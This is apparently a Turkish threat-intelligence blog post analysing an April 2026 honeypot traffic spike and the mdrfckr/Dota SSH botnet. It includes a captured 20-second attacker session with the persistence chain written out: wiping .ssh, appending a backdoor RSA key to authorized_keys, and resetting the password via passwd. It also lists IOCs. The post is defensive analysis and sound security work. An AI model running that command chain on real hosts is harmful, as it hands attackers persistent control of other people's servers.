14 Nisan Zirvesi: mdrfckr/Dota Botnet Kampanyası
14 Nisan'da 2.7M event rekoru: mdrfckr imzalı SSH backdoor, DoublePulsar patlaması ve 2017'den beri aktif Dota botnetinin playbook'u.
Özet
Önceki deep-dive’da 14 Nisan’ı “5.14M event ile yeni zirve” olarak geçmiştik. Ama o yazının odağı Winbox ve GPON’du. 14 Nisan’ın 2.70M event’lik gününü asıl açıklayan şey bambaşka: mdrfckr/Dota botnet. Cowrie’den gelen 1.164 malware indirme event’inin tamamına yakını aynı SHA256 hash’ine ait, Suricata’da 7.508 DoublePulsar alert’i patladı ve bir session’da saldırganın komut zinciri mükemmel bir post-exploitation playbook olarak kaydedildi.
Bu yazıda üç konuyu inceliyoruz:
- 14 Nisan zirvesinin anatomisi — neden 2.70M?
- mdrfckr/Dota botnet profili ve güncel playbook
- Canlı session analizi: e2ad715cf563
1. 14 Nisan Zirvesinin Anatomisi
Günlük normal hacim 1–1.6M event civarında. 14 Nisan bunu %69 aştı.
| Tarih | Event | Not |
|---|---|---|
| 12 Nisan | 1.04M | Normal |
| 13 Nisan | 1.47M | Yükselen |
| 14 Nisan | 2.70M | Rekor |
| 15 Nisan | 1.60M | Normale dönüş |
| 16 Nisan | 207K+ | Çoğalıyor (kısmi gün) |
Pot Bazında Dağılım (14 Nisan)
| Pot | Kayıt | Pay |
|---|---|---|
| Suricata | 2.339.837 | %86.6 |
| P0f | 272.247 | %10.1 |
| Cowrie | 50.351 | %1.9 |
| Fatt | 24.447 | %0.9 |
| Diğer | ~13.353 | %0.5 |
Suricata’nın %86.6 payı, zirvenin ağ katmanında yaşandığına işaret ediyor. 85.000 gerçek alert’in geri kalanı ise flow event — saldırgan tarafından tetiklenen, ancak ayrı alert üretmeyen bağlantı kayıtları.
14 Nisan’ı Yapan Üç IP
| IP | Kayıt | ASN |
|---|---|---|
| 81.169.145.72 | 453.032 | DE — Strato AG |
| 207.150.212.42 | 373.440 | US |
| 167.235.101.42 | 320.347 | DE — Hetzner |
Bu üç adres 14 Nisan toplamının %43’ünü tek başına üretmiş. Birbiriyle koordineli olmayan ama aynı dönemde aktif üç büyük tarayıcı. Saatlik dağılım gece 20:00–21:00 UTC’de sert bir zirve gösteriyor (%35 üzeri), ancak gece boyunca trafik asla 74K/saat’in altına inmiyor — sürekli, yüksek yoğunluklu bir kampanya.
Suricata’nın İki Baskın İmzası
| İmza | Hit |
|---|---|
| GPL INFO VNC server response | 10.558 |
| ET EXPLOIT DoublePulsar Backdoor installation communication | 7.508 |
| ET DOS DNS Amplification Attack Inbound | 1.434 |
| KEYPLUG/Conficker-C P2P (4 varyant) | 3.922 |
DoublePulsar (2017 NSA ShadowBrokers sızıntısı) ve Conficker-C P2P kombinasyonu bu pencerede ilk kez bu boyuta ulaştı. Her ikisi de EternalBlue ekosistemi bileşenleri — SMB port 445 üzerinden Windows sistemleri hedefliyorlar. Dionaea’da aynı dönemde port 445 saldırılarının %97’ye yükselmesi (34.289 hit) bu örüntüyü tamamlıyor.
EternalBlue açığı 9 yıl önce kamuoyuna sızdı. Ancak güncel olmayan Windows sistemleri, özellikle SMB-1 protokolü etkin cihazlar ve hatalı güncelleme politikasına sahip kurumsal ağlar hâlâ savunmasız. WannaCry (2017) ve NotPetya (2017) bu açığı kullandı — ve exploiti kullanan botnet altyapısı hâlâ internette dolaşıyor.
2. mdrfckr/Dota Botnet Profili
Kim, Ne Zaman, Nasıl
mdrfckr, en az 2017’den beri aktif olan, SSH brute-force ile yayılan ve Dota adıyla kataloglanmış bir botnet ailesinin imzasıdır. Bazı raporlarda Outlaw Hacking Group ile ilişkilendirilmektedir.
Temmuz 2022’de tek bir gözlem penceresinde 13.000 benzersiz IP’den (152 ülke) trafik tespit edildi. Dört yıl sonra, Nisan 2026’da honeypot ağımız bu kampanyanın aktif bir dalgasını yakaladı.
Kampanya Özellikleri
| Özellik | Değer |
|---|---|
| Yayılma vektörü | SSH brute-force (port 22) |
| SSH client | libssh-0.6.0 / libssh-0.6.3 (2013–2014) |
| HASSH fingerprint | 51cba57125523ce4b9db67714a90bf6e |
| Payload transferi | SCP (HTTP/S değil — C2’ye bağımlı değil) |
| Payload SHA256 | a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 |
| Backdoor imzası | ssh-rsa ...== mdrfckr |
| Hedef | CPU/RAM profili yüksek Linux sunucular (cryptominer) |
libssh-0.6.0 kullanımı kasıtlı. Modern SSH fingerprinting araçları bu client’ı anomali olarak işaretler; ama birçok IDS/SIEM kuralı yeni versiyonlara odaklandığından eski versiyonlar gözden kaçabilir.
Standart Playbook (Dota/mdrfckr)
1. Brute-force → SSH erişim
2. .ssh dizinini sil, yeniden oluştur
3. authorized_keys'e backdoor RSA key ekle ← kalıcı erişim
4. SCP ile payload yükle
5. root şifresini değiştir ← rakip erişimi kes
6. Sistem profilini al (CPU çekirdek, RAM, mimari, disk) ← hedef değerleme
7. crontab -l / w ← rakip varlık kontrolü
8. [Bağlantıyı kapat — payload sonraki oturumda çalışır]Komut 3 (authorized_keys) ve 5 (şifre değiştirme) kombinasyonu çift kilitli persistence sağlar: key varken şifre değişse de, şifre değişince key korunur.
3. Canlı Session Analizi: e2ad715cf563
14 Nisan 23:24 UTC, kaynak 121.168.139.251 (CN, Tencent Cloud). Giriş credential’ı: debian:test123. Session süresi 20 saniye — hız ve otomasyon tam.
Komut Zinciri (Kronolojik)
# [23:24:03] GİRİŞ
# credential: debian:test123
# [23:24:04] — Adım 1: Persistence hazırlığı
cd ~; chattr -ia .ssh; lockr -ia .ssh
# immutable bit kaldırma (lockr mevcut değil → hata, devam eder)
# [23:24:04] — Adım 2: Backdoor key yerleştirme
cd ~ && rm -rf .ssh && mkdir .ssh && \
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun...oRw== mdrfckr" \
>> .ssh/authorized_keys && \
chmod -R go= ~/.ssh
# [23:24:05] — Adım 3: SCP payload transferi
# SHA256: a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2
# Çıktı: ~/dl/<sha256>
# [23:24:10–11] — Adım 4: Şifre kilitleme
echo -e "test123\nn6gHWV4510ip\nn6gHWV4510ip" | passwd
# Yeni şifre: n6gHWV4510ip
# [23:24:11–22] — Adım 5: Sistem profili (mining değerleme)
cat /proc/cpuinfo | grep name | wc -l # CPU çekirdek sayısı
cat /proc/cpuinfo | grep name | head -n 1 # CPU model
free -m | grep Mem # RAM
uname -m # Mimari (x86_64/aarch64?)
uname -a # Kernel
lscpu | grep Model # CPU detay
df -h | head -n 2 | awk 'FNR==2{print $2}' # Disk boyutu
crontab -l # Rakip bot var mı?
w # Başka bağlı kullanıcı?
top # Çalışan süreçler
# [23:24:22] — SESSION KAPANDIToplam süre: 20 saniye. Bu hız ve komut sırası tam otomasyona işaret ediyor — bir insanın bu kadar hızlı yazması mümkün değil.
Sistem Profili Neden Alınıyor?
| Komut | Ölçülen Değer | Amaç |
|---|---|---|
cpuinfo çekirdek sayısı | CPU gücü | Mining profitability hesabı |
free -m | RAM | Miner bellek limiti |
uname -m | Mimari | Doğru binary seç (x86/ARM) |
df -h | Disk | Depolama kapasitesi |
crontab -l / w | Rakip varlık | Kalabalık hedeften çekilme kararı |
Saldırgan bu verileri muhtemelen bir C2 sunucusuna raporluyor. Düşük çekirdekli, az RAM’li veya zaten başka bir miner çalışan hedefler düşük önceliğe alınıyor.
Bir Linux sunucusunda açıklanamayan SSH girişleri, şifre değişikliği veya yeni cron job gördüyseniz önce ~/.ssh/authorized_keys ve /root/.ssh/authorized_keys dosyalarını kontrol edin. mdrfckr imzalı key görürseniz: anahtarı silin, şifreyi değiştirin, tüm aktif SSH oturumlarını sonlandırın ve disk üzerindeki ~/dl/ dizinini inceleyin.
Cowrie File Download: 1.164 Event, Tek Payload
3 günlük pencerede (14–16 Nisan) Cowrie’de 1.164 malware indirme event’i kaydedildi. Bu event’lerin büyük çoğunluğu aynı SHA256 hash’ini taşıyor:
a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2Transferin HTTP üzerinden değil SCP ile gerçekleşmesi kritik bir detay: saldırgan payload’ı harici bir C2’den indirmiyor, kendi makinesinden doğrudan yüklüyor. Bu:
- C2 URL’si IOC olarak kaydedilemiyor
- Payload’ın sızma anında mevcut binary’den derlenmesi yerine hazır tutulduğunu gösteriyor
- İndirmenin ağ katmanında engellenmesini zorlaştırıyor (port 22 zaten açık olmalı)
Bu hash, port22.dk ve birden fazla honeypot araştırmacısının mdrfckr IOC listesinde birebir kayıtlı. Yani 14 Nisan’da honeypot ağımıza yüklenen payload, en az 2022’den beri aktif olan aynı kampanyanın devamı.
Credential Scanner Katmanı
mdrfckr kampanyası tek aşamalı değil. Brute-force için distributed bir scanner ağı kullanıyor.
345gs5662d34 credential’ı ile giriş deneyen 18 farklı IP’nin pattern’i bu scanner ağının iyi bir örneği: 18 ayrı ASN’den koordineli tarama, giriş başarılı olduğunda komut çalıştırılmıyor — sadece “bu credential çalışıyor” bilgisi raporlanıyor. Bir sonraki aşamada farklı bir IP grubunun exploit oturumunu açmasını bekliyoruz.
345gs5662d34 credential’ı ve geniş context için önceki deep-dive’a bakabilirsiniz.
IOC Listesi
| Gösterge | Tür | Bağlam |
|---|---|---|
a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 | SHA256 | mdrfckr/Dota payload — 1.164 indirme |
ssh-rsa AAAAB3NzaC1yc2EAAAAB...oRw== mdrfckr | SSH Public Key | Backdoor authorized_keys anahtarı |
51cba57125523ce4b9db67714a90bf6e | HASSH | mdrfckr SSH client fingerprint |
libssh-0.6.0 / libssh-0.6.3 | SSH client | Kasıtlı eski versiyon |
n6gHWV4510ip | Parola | Hedef sisteme set edilen yeni şifre |
121.168.139.251 | IP | CN — Tencent Cloud, session e2ad715cf563 |
81.169.145.72 | IP | DE — Strato AG, 14 Nisan 453K event |
207.150.212.42 | IP | US, 14 Nisan 373K event |
167.235.101.42 | IP | DE — Hetzner, 14 Nisan 320K event |
101.36.108.125 | IP | CN — Tencent, credential scanner |
81.30.212.94 | IP | DE, credential scanner |
50.225.176.238 | IP | US, credential scanner |
IOC’lar CC0 lisansı altında — atıf gerekmeksizin kullanabilirsiniz.
Sonuç
14 Nisan’ın 2.70M event rekoru üç büyük tarayıcı ve EternalBlue ekosisteminin bir dalgasından kaynaklandı — ama günün asıl hikayesi Cowrie’den geldi: 1.164 malware indirme, mdrfckr backdoor key ve 20 saniyelik tam otomatik bir saldırı oturumu.
mdrfckr/Dota botnet 2017’den beri aktif, 2026’da hâlâ aynı playbook’u çalıştırıyor. authorized_keys’e RSA key ekleme, SCP ile payload yükleme, şifre kilitleme ve CPU/RAM profillemesi — sekiz yıl önce geliştirilen senaryo değişmedi çünkü değişmesine gerek kalmadı. Patchlenmemiş SSH, zayıf credential ve izlenmemiş authorized_keys dosyaları hâlâ kampanyanın yakıtı.
Bir sonraki yazıda: Suricata’dan gelen Conficker-C P2P trafiğinin coğrafi kökeni ve aktif botnet havuzunun büyüklüğü tahmini.
Lisans: CC BY 4.0 — Atıf yapılarak serbestçe kullanılabilir.
Tüm veriler OPSEC filtreli. SiberKale altyapı IP’leri, RFC1918, CGNAT ve bilinen tarayıcı servisleri (Shodan, Censys, Palo Alto Xpanse) filtrelenmiştir.
SiberKale Tellal — Threat Intelligence Feed · tellal.net